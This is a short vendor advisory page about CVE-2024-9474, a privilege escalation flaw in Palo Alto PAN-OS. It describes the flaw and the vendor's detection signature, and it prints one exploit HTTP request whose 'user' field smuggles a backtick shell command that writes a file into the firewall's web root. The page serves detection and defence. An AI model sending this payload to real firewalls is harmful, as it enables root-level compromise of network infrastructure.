top of page

Palo Alto PAN-OS Privilege Escalation Remote Code Execution (CVE-2024-9474)



Application Details

PAN-OS is the software that runs all Palo Alto Networks next-generation firewalls.


Vulnerability

A privilege escalation vulnerability in the Palo Alto Networks PAN-OS software.


Identification

This vulnerability could allow a PAN-OS administrator with access to the management web interface, to be able to perform "root privilege" tasks on the firewall.


POST /php/utils/createRemoteAppwebSession.php/watchTowr.js.map

user=`echo $(uname -a) > /var/appweb/htdocs/unauth/watchTowr.php`&userRole=superuser&remoteHost=&vsys=vsys1

Detection

By turning this into a traffic file and matching rule, we are able to detect attempts to execute arbitrary code on the system.


Coverage

Idappcom have created signature 8025485 along with a traffic file for this vulnerability.


References


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional

Comments


bottom of page